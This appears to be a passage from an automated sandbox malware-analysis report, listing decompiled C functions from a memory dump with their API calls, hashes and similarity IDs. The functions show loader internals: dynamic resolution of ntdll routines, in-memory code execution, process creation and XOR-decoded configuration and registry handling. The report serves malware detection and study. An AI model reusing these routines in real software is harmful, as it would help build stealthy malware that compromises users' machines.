Instruction Fuzzy Hash: 9E316476A01306ABDB16DF59D884AAEB7BCBF44740F1140A9EE05DB341DB30EA46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BA8D99, Relevance: 12.1, APIs: 8, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00BA8D99(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t39;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t57;
				void* _t66;
				intOrPtr _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;

				_t1 = __eax + 0x14; // 0x74183966
				_t67 =  *_t1;
				_t36 = E00BA933F(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
				_t39 = _v12(_v12);
				_v8 = _t39;
				if(_t39 == 0 && ( *0xbad260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t46 =  *0xbad2a4; // 0x44fa5a8
					_t18 = _t46 + 0xbae3e6; // 0x73797325
					_t66 = E00BA27B6(_t18);
					if(_t66 == 0) {
						_v8 = 8;
					} else {
						_t49 =  *0xbad2a4; // 0x44fa5a8
						_t19 = _t49 + 0xbae747; // 0x50a8cef
						_t20 = _t49 + 0xbae0af; // 0x4e52454b
						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t69 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E00BA94FB();
							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E00BA94FB();
							if(_t57 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xbad238, 0, _t66);
					}
				}
				_t68 = _v16;
				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
				E00BA677C(_t68);
				goto L12;
			}

0x00ba8da1
0x00ba8da1
0x00ba8db0
0x00ba8db7
0x00ba8dbc
0x00ba8ecc
0x00ba8ed3
0x00ba8ed3
0x00ba8dcb
0x00ba8dd6
0x00ba8dd9
0x00ba8dde
0x00ba8df3
0x00ba8df9
0x00ba8dfa
0x00ba8dfd
0x00ba8e03
0x00ba8e06
0x00ba8e0b
0x00ba8e13
0x00ba8e1f
0x00ba8e23
0x00ba8eb3
0x00ba8e29
0x00ba8e29
0x00ba8e2e
0x00ba8e35
0x00ba8e49
0x00ba8e4d
0x00ba8e9c
0x00ba8e4f
0x00ba8e50
0x00ba8e57
0x00ba8e70
0x00ba8e72
0x00ba8e76
0x00ba8e7d
0x00ba8e97
0x00ba8e7f
0x00ba8e88
0x00ba8e8d
0x00ba8e8d
0x00ba8e7d
0x00ba8eab
0x00ba8eab
0x00ba8e23
0x00ba8eba
0x00ba8ec3
0x00ba8ec7
0x00000000

APIs

Part of subcall function 00BA933F: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00BA8DB5,?,00000001,?,?,00000000,00000000), ref: 00BA9364
Part of subcall function 00BA933F: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00BA9386
Part of subcall function 00BA933F: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00BA939C
Part of subcall function 00BA933F: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00BA93B2
Part of subcall function 00BA933F: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00BA93C8
Part of subcall function 00BA933F: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00BA93DE

memcpy.NTDLL(00000001,?,?,?,00000001,?,?,00000000,00000000), ref: 00BA8DCB
memset.NTDLL ref: 00BA8E06

Part of subcall function 00BA27B6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00BA5073,63699BCE,00BA52BC,73797325), ref: 00BA27C7
Part of subcall function 00BA27B6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00BA27E1

GetModuleHandleA.KERNEL32(4E52454B,050A8CEF,73797325), ref: 00BA8E3C
GetProcAddress.KERNEL32(00000000), ref: 00BA8E43
HeapFree.KERNEL32(00000000,00000000), ref: 00BA8EAB

Part of subcall function 00BA94FB: GetProcAddress.KERNEL32(36776F57,00BA341A), ref: 00BA9516

CloseHandle.KERNEL32(00000000,00000001), ref: 00BA8E88
CloseHandle.KERNEL32(?), ref: 00BA8E8D
GetLastError.KERNEL32(00000001), ref: 00BA8E91

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
String ID:
API String ID: 478747673-0
Opcode ID: 450da5d63e742d2f1fbb8e11041c668a61f930296c263cf04be48516067946f8
Instruction ID: 8a5802c135c2e019966e4b08b025826e6359936b43f154b1e7f29aa0f6f5c8d6
Opcode Fuzzy Hash: 450da5d63e742d2f1fbb8e11041c668a61f930296c263cf04be48516067946f8
Instruction Fuzzy Hash: 043140B6804209EFDB20AFA4DC89D9EBFFCEB09344F1044A5F605A7121DB709D44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA1A30, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00BA1A30(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xbad2a4; // 0x44fa5a8
				_t1 = _t9 + 0xbae62c; // 0x253d7325
				_t36 = 0;
				_t28 = E00BA62FC(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E00BA8D59(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E00BA98DC(_t34, _t41, _a8);
						E00BA677C(_t41);
						_t42 = E00BAA79A(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00BA677C(_t36);
							_t36 = _t42;
						}
						_t43 = E00BA226B(_t36, _t33);
						if(_t43 != 0) {
							E00BA677C(_t36);
							_t36 = _t43;
						}
					}
					E00BA677C(_t28);
				}
				return _t36;
			}

0x00ba1a30
0x00ba1a33
0x00ba1a34
0x00ba1a3c
0x00ba1a43
0x00ba1a4a
0x00ba1a4e
0x00ba1a54
0x00ba1a5b
0x00ba1a60
0x00ba1a72
0x00ba1a76
0x00ba1a7a
0x00ba1a80
0x00ba1a85
0x00ba1a95
0x00ba1a97
0x00ba1aae
0x00ba1ab2
0x00ba1ab5
0x00ba1aba
0x00ba1aba
0x00ba1ac3
0x00ba1ac7
0x00ba1aca
0x00ba1acf
0x00ba1acf
0x00ba1ac7
0x00ba1ad2
0x00ba1ad2
0x00ba1add

APIs

Part of subcall function 00BA62FC: lstrlen.KERNEL32(00000000,00000000,00000000,745EC740,?,?,?,00BA1A4A,253D7325,00000000,00000000,745EC740,?,?,00BA1EFB,?), ref: 00BA6363
Part of subcall function 00BA62FC: sprintf.NTDLL ref: 00BA6384

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,00BA1EFB,?,050A95B0), ref: 00BA1A5B
lstrlen.KERNEL32(?,?,?,00BA1EFB,?,050A95B0), ref: 00BA1A63

Part of subcall function 00BA8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00BA9099), ref: 00BA8D65

strcpy.NTDLL ref: 00BA1A7A
lstrcat.KERNEL32(00000000,?), ref: 00BA1A85

Part of subcall function 00BA98DC: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00BA1A94,00000000,?,?,?,00BA1EFB,?,050A95B0), ref: 00BA98F3

Part of subcall function 00BA677C: HeapFree.KERNEL32(00000000,00000000,00BA9161,00000000,?,?,00000000), ref: 00BA6788

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00BA1EFB,?,050A95B0), ref: 00BA1AA2

Part of subcall function 00BAA79A: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00BA1AAE,00000000,?,?,00BA1EFB,?,050A95B0), ref: 00BAA7A4
Part of subcall function 00BAA79A: _snprintf.NTDLL ref: 00BAA802

Strings

=, xrefs: 00BA1A9C

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 1c881c61ba470445d1bf4220b999e2062a6cd05e12b3db50878dc3bff5828163
Instruction ID: 1f918b0350ef6b8268dfdb20210a4768694816542de9454cdcd5cd31be0d45cd
Opcode Fuzzy Hash: 1c881c61ba470445d1bf4220b999e2062a6cd05e12b3db50878dc3bff5828163
Instruction Fuzzy Hash: F11125779096257B4B127BB99C86D6F3BECDE8B7A43090496F904A7212CE34CC0287A0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA2E55, Relevance: 9.2, APIs: 6, Instructions: 185
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00BA2E55(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t18;
				signed int _t23;
				char* _t29;
				char* _t30;
				char* _t31;
				char* _t32;
				char* _t33;
				void* _t34;
				void* _t35;
				signed int _t40;
				void* _t42;
				void* _t43;
				signed int _t45;
				signed int _t49;
				signed int _t53;
				signed int _t57;
				signed int _t61;
				signed int _t65;
				void* _t70;
				intOrPtr _t85;

				_t71 = __ecx;
				_t18 =  *0xbad2a0; // 0x63699bc3
				if(E00BA3034( &_v12,  &_v8, _t18 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0xbad2d0 = _v12;
				}
				_t23 =  *0xbad2a0; // 0x63699bc3
				if(E00BA3034( &_v12,  &_v8, _t23 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L48;
				} else {
					_t70 = _v12;
					if(_t70 == 0) {
						_t29 = 0;
					} else {
						_t65 =  *0xbad2a0; // 0x63699bc3
						_t29 = E00BA6676(_t71, _t70, _t65 ^ 0x724e87bc);
					}
					if(_t29 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
							 *0xbad240 = _v8;
						}
					}
					if(_t70 == 0) {
						_t30 = 0;
					} else {
						_t61 =  *0xbad2a0; // 0x63699bc3
						_t30 = E00BA6676(_t71, _t70, _t61 ^ 0x2b40cc40);
					}
					if(_t30 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
							 *0xbad244 = _v8;
						}
					}
					if(_t70 == 0) {
						_t31 = 0;
					} else {
						_t57 =  *0xbad2a0; // 0x63699bc3
						_t31 = E00BA6676(_t71, _t70, _t57 ^ 0x3b27c2e6);
					}
					if(_t31 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0xbad248 = _v8;
						}
					}
					if(_t70 == 0) {
						_t32 = 0;
					} else {
						_t53 =  *0xbad2a0; // 0x63699bc3
						_t32 = E00BA6676(_t71, _t70, _t53 ^ 0x0602e249);
					}
					if(_t32 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0xbad004 = _v8;
						}
					}
					if(_t70 == 0) {
						_t33 = 0;
					} else {
						_t49 =  *0xbad2a0; // 0x63699bc3
						_t33 = E00BA6676(_t71, _t70, _t49 ^ 0x3603764c);
					}
					if(_t33 != 0) {
						_t71 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0xbad02c = _v8;
						}
					}
					if(_t70 == 0) {
						_t34 = 0;
					} else {
						_t45 =  *0xbad2a0; // 0x63699bc3
						_t34 = E00BA6676(_t71, _t70, _t45 ^ 0x2cc1f2fd);
					}
					if(_t34 != 0) {
						_push(_t34);
						_t42 = 0x10;
						_t43 = E00BA5AC8(_t42);
						if(_t43 != 0) {
							_push(_t43);
							E00BA59EE();
						}
					}
					if(_t70 == 0) {
						_t35 = 0;
					} else {
						_t40 =  *0xbad2a0; // 0x63699bc3
						_t35 = E00BA6676(_t71, _t70, _t40 ^ 0xb30fc035);
					}
					if(_t35 != 0 && E00BA5AC8(0, _t35) != 0) {
						_t85 =  *0xbad324; // 0x50a95b0
						E00BA972C(_t85 + 4, _t38);
					}
					HeapFree( *0xbad238, 0, _t70);
					L48:
					return 0;
				}
			}

0x00ba2e55
0x00ba2e58
0x00ba2e78
0x00ba2e86
0x00ba2e86
0x00ba2e8b
0x00ba2ea5
0x00ba302c
0x00ba302e
0x00000000
0x00ba2eab
0x00ba2eab
0x00ba2eb2
0x00ba2ec8
0x00ba2eb4
0x00ba2eb4
0x00ba2ec1
0x00ba2ec1
0x00ba2ed2
0x00ba2ed4
0x00ba2ede
0x00ba2ee3
0x00ba2ee3
0x00ba2ede
0x00ba2eea
0x00ba2f00
0x00ba2eec
0x00ba2eec
0x00ba2ef9
0x00ba2ef9
0x00ba2f04
0x00ba2f06
0x00ba2f10
0x00ba2f15
0x00ba2f15
0x00ba2f10
0x00ba2f1c
0x00ba2f32
0x00ba2f1e
0x00ba2f1e
0x00ba2f2b
0x00ba2f2b
0x00ba2f36
0x00ba2f38
0x00ba2f42
0x00ba2f47
0x00ba2f47
0x00ba2f42
0x00ba2f4e
0x00ba2f64
0x00ba2f50
0x00ba2f50
0x00ba2f5d
0x00ba2f5d
0x00ba2f68
0x00ba2f6a
0x00ba2f74
0x00ba2f79
0x00ba2f79
0x00ba2f74
0x00ba2f80
0x00ba2f96
0x00ba2f82
0x00ba2f82
0x00ba2f8f
0x00ba2f8f
0x00ba2f9a
0x00ba2f9c
0x00ba2fa6
0x00ba2fab
0x00ba2fab
0x00ba2fa6
0x00ba2fb2
0x00ba2fc8
0x00ba2fb4
0x00ba2fb4
0x00ba2fc1
0x00ba2fc1
0x00ba2fcc
0x00ba2fce
0x00ba2fd1
0x00ba2fd2
0x00ba2fd9
0x00ba2fdb
0x00ba2fdc
0x00ba2fdc
0x00ba2fd9
0x00ba2fe3
0x00ba2ff9
0x00ba2fe5
0x00ba2fe5
0x00ba2ff2
0x00ba2ff2
0x00ba2ffd
0x00ba300b
0x00ba3015
0x00ba3015
0x00ba3022
0x00ba302f
0x00ba3033
0x00ba3033

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,00BA5068,?,63699BC3,00BA5068,?,63699BC3,00000005,00BAD00C,00000008,?,00BA5068), ref: 00BA2EDA
StrToIntExA.SHLWAPI(00000000,00000000,?,00BA5068,?,63699BC3,00BA5068,?,63699BC3,00000005,00BAD00C,00000008,?,00BA5068), ref: 00BA2F0C
StrToIntExA.SHLWAPI(00000000,00000000,?,00BA5068,?,63699BC3,00BA5068,?,63699BC3,00000005,00BAD00C,00000008,?,00BA5068), ref: 00BA2F3E
StrToIntExA.SHLWAPI(00000000,00000000,?,00BA5068,?,63699BC3,00BA5068,?,63699BC3,00000005,00BAD00C,00000008,?,00BA5068), ref: 00BA2F70
StrToIntExA.SHLWAPI(00000000,00000000,?,00BA5068,?,63699BC3,00BA5068,?,63699BC3,00000005,00BAD00C,00000008,?,00BA5068), ref: 00BA2FA2
HeapFree.KERNEL32(00000000,00BA5068,00BA5068,?,63699BC3,00BA5068,?,63699BC3,00000005,00BAD00C,00000008,?,00BA5068), ref: 00BA3022

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 3400af271a46096254e2221b9634add66de67acdc31f4b51cf55afb204f2de8d
Instruction ID: 3f25ec21e13283369add70de9f0349df8ee7a00a4615056832dd9a2344368662
Opcode Fuzzy Hash: 3400af271a46096254e2221b9634add66de67acdc31f4b51cf55afb204f2de8d
Instruction Fuzzy Hash: E9517370A18205AECB21EBBCDDCAE9B77FDEB4A700B640995B402D7119EA32DD41C720

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA236, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 00BAA290
SysAllocString.OLEAUT32(0070006F), ref: 00BAA2A4
SysAllocString.OLEAUT32(00000000), ref: 00BAA2B6
SysFreeString.OLEAUT32(00000000), ref: 00BAA31E
SysFreeString.OLEAUT32(00000000), ref: 00BAA32D
SysFreeString.OLEAUT32(00000000), ref: 00BAA338

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: f8884d22d1e25dc1fc3edad07f5c4d1aa7fb0e88379e479124f41681fa465303
Instruction ID: 7b5f353c9c6d8de4bcadc9ae4184f776015a6c847b1f826c0c37b59e8357161e
Opcode Fuzzy Hash: f8884d22d1e25dc1fc3edad07f5c4d1aa7fb0e88379e479124f41681fa465303
Instruction Fuzzy Hash: DD413036900609AFDF11DFB8D845A9EB7FAEF4A310F144465E914EB220DB71DD05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BA933F, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BA933F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00BA8D59(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xbad2a4; // 0x44fa5a8
					_t1 = _t23 + 0xbae11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xbad2a4; // 0x44fa5a8
					_t2 = _t26 + 0xbae769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00BA677C(_t54);
					} else {
						_t30 =  *0xbad2a4; // 0x44fa5a8
						_t5 = _t30 + 0xbae756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xbad2a4; // 0x44fa5a8
							_t7 = _t33 + 0xbae40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xbad2a4; // 0x44fa5a8
								_t9 = _t36 + 0xbae4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xbad2a4; // 0x44fa5a8
									_t11 = _t39 + 0xbae779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00BA5194(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00ba934e
0x00ba9352
0x00ba9414
0x00ba9358
0x00ba9358
0x00ba935d
0x00ba9370
0x00ba9372
0x00ba9377
0x00ba937f
0x00ba9386
0x00ba9388
0x00ba938d
0x00ba940c
0x00ba940d
0x00ba938f
0x00ba938f
0x00ba9394
0x00ba939c
0x00ba939e
0x00ba93a3
0x00000000
0x00ba93a5
0x00ba93a5
0x00ba93aa
0x00ba93b2
0x00ba93b4
0x00ba93b9
0x00000000
0x00ba93bb
0x00ba93bb
0x00ba93c0
0x00ba93c8
0x00ba93ca
0x00ba93cf
0x00000000
0x00ba93d1
0x00ba93d1
0x00ba93d6
0x00ba93de
0x00ba93e0
0x00ba93e5
0x00000000
0x00ba93e7
0x00ba93ed
0x00ba93f2
0x00ba93f9
0x00ba93fe
0x00ba9403
0x00000000
0x00ba9405
0x00ba9408
0x00ba9408
0x00ba9403
0x00ba93e5
0x00ba93cf
0x00ba93b9
0x00ba93a3
0x00ba938d
0x00ba9422

APIs

Part of subcall function 00BA8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00BA9099), ref: 00BA8D65

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00BA8DB5,?,00000001,?,?,00000000,00000000), ref: 00BA9364
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00BA9386
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00BA939C
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00BA93B2
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00BA93C8
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00BA93DE

Part of subcall function 00BA5194: memset.NTDLL ref: 00BA5213

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: bd4b2162097b20313e293feea786c2b7343cc86fff52bcb3d30354876d21e1a9
Instruction ID: cda1c390dc4ae430069a1d458dfa8ca2cad61e3fa81313f2cac93e46e34a130d
Opcode Fuzzy Hash: bd4b2162097b20313e293feea786c2b7343cc86fff52bcb3d30354876d21e1a9
Instruction Fuzzy Hash: 4A212FB1604706EFDB20DF69CC85E6A7BECEF4A30070144A6E509DB221DF74E906DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BA6791, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00BA6791(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				int _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0xbad33c);
					_t96 = 0x80000002;
					L6:
					_t60 = E00BA978C(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E00BAA0A7(_t97, _t105, _t96, _t60) != 0) {
						L27:
						E00BA677C(_a8);
						goto L29;
					}
					_t65 =  *0xbad2a4; // 0x44fa5a8
					_t16 = _t65 + 0xbae8fe; // 0x65696c43
					_t68 = E00BA978C(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t33 = _t105 + 0x10; // 0x3d00bac0
						if(E00BA66BD( *_t33, _t96, _a8,  *0xbad334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0xbad2a4; // 0x44fa5a8
							if(_t102 == 0) {
								_t35 = _t72 + 0xbaea5f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0xbae89f; // 0x55434b48
								_t73 = _t34;
							}
							if(E00BA15EE( &_a24, _t73,  *0xbad334,  *0xbad338,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t75 =  *0xbad2a4; // 0x44fa5a8
									_t44 = _t75 + 0xbae871; // 0x74666f53
									_t78 = E00BA978C(0, _t44);
									_t103 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d00bac0
										E00BA5931( *_t47, _t96, _a8,  *0xbad338, _a24);
										_t49 = _t105 + 0x10; // 0x3d00bac0
										E00BA5931( *_t49, _t96, _t103,  *0xbad330, _a16);
										E00BA677C(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d00bac0
									E00BA5931( *_t40, _t96, _a8,  *0xbad338, _a24);
									_t43 = _t105 + 0x10; // 0x3d00bac0
									E00BA5931( *_t43, _t96, _a8,  *0xbad330, _a16);
								}
								if( *_t105 != 0) {
									E00BA677C(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d00bac0
					if(E00BA63A4( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t104 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t104 =  *_t104 & 0x00000000;
							_t26 = _t105 + 0x10; // 0x3d00bac0
							E00BA66BD( *_t26, _t96, _a8, _a24, _t104);
						}
						E00BA677C(_t104);
						_t102 = _a16;
					}
					E00BA677C(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t102);
					__imp__(_t106 + _t102 - 0x117,  *0xbad33c);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}

0x00ba6791
0x00ba679a
0x00ba67a1
0x00ba67a6
0x00ba6815
0x00ba681b
0x00ba6820
0x00ba6829
0x00ba682e
0x00ba6833
0x00ba69a7
0x00ba69ae
0x00ba69ae
0x00ba69b3
0x00ba69b5
0x00ba69b5
0x00ba69be
0x00ba69be
0x00ba6839
0x00ba6845
0x00ba699d
0x00ba69a0
0x00000000
0x00ba69a0
0x00ba684b
0x00ba6850
0x00ba6859
0x00ba685e
0x00ba6863
0x00ba68ad
0x00ba68ad
0x00ba68c0
0x00ba68ca
0x00ba68d0
0x00ba68d7
0x00ba68e1
0x00ba68e1
0x00ba68d9
0x00ba68d9
0x00ba68d9
0x00ba68d9
0x00ba6903
0x00ba690b
0x00ba6939
0x00ba693e
0x00ba6947
0x00ba694c
0x00ba6950
0x00ba6982
0x00ba6952
0x00ba695f
0x00ba6962
0x00ba6972
0x00ba6975
0x00ba697b
0x00ba697b
0x00ba690d
0x00ba691a
0x00ba691d
0x00ba692f
0x00ba6932
0x00ba6932
0x00ba698c
0x00ba6998
0x00ba698e
0x00ba6991
0x00ba6991
0x00ba698c
0x00ba6903
0x00000000
0x00ba68ca
0x00ba6872
0x00ba687c
0x00ba687e
0x00ba6883
0x00ba6887
0x00ba6889
0x00ba6894
0x00ba6897
0x00ba6897
0x00ba689d
0x00ba68a2
0x00ba68a2
0x00ba68a8
0x00000000
0x00ba68a8
0x00ba67ab
0x00000000
0x00ba67d2
0x00ba67dd
0x00ba67f3
0x00ba67f9
0x00ba6801
0x00000000
0x00ba6801

APIs

